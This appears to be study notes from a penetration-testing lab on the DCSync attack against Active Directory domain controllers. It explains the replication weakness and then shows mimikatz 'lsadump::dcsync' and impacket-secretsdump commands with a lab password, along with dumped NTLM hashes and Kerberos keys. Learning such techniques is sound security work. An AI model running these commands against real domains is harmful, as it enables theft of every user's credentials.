Domain Controllers Synchronization Attack

This attack requires to have compromised a high privilege user as descbrided in Theory

Theory

In production environments, domains typically rely on more than one domain controller to provide redundancy. The Directory Replication Service (DRS) Remote Protocol1 uses replication2 to synchronize these redundant domain controllers. A domain controller may request an update for a specific object, like an account, using the IDL_DRSGetNCChanges3 API.

The DC receiving the update request doesn't check if the request comes from a known DC.

The goal of this attack is to send a road request update to obtain the passwords of all the users.

To do this, our user must have the following privileges =>Replicating Directory Changes, Replicating Directory Changes All, and Replicating Directory Changes in Filtered Set

Members of the Domain Admins, Enterprise Admins, or the Administrators group at the domain level have those rights and privileges.

Attack from domain-joined Windows

We launch mimikatz and run the attack and get the hash of the Administrator for example:

mimikatz # lsadump::dcsync /user:corp\Administrator
...
Credentials:
  Hash NTLM: 2892d26cdf84d7a70e2eb3b9f05c425e
...

No that we have the hash we can crack it.

Attack from Kali

We want the hash of dave:

impacket-secretsdump -just-dc-user dave corp.com/jeffadmin:"BrouhahaTungPerorateBroom2023\!"@192.168.50.70

We use the IP of the domain controller

We get it!

Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
dave:1103:aad3b435b51404eeaad3b435b51404ee:08d7a47a6f9f66b97b1bae4178747494:::
[*] Kerberos keys grabbed
dave:aes256-cts-hmac-sha1-96:4d8d35c33875a543e3afa94974d738474a203cd74919173fd2a64570c51b1389
dave:aes128-cts-hmac-sha1-96:f94890e59afc170fd34cfbd7456d122b
dave:des-cbc-md5:1a329b4338bfa215
[*] Cleaning up...

it's 08d7a47a6f9f66b97b1bae4178747494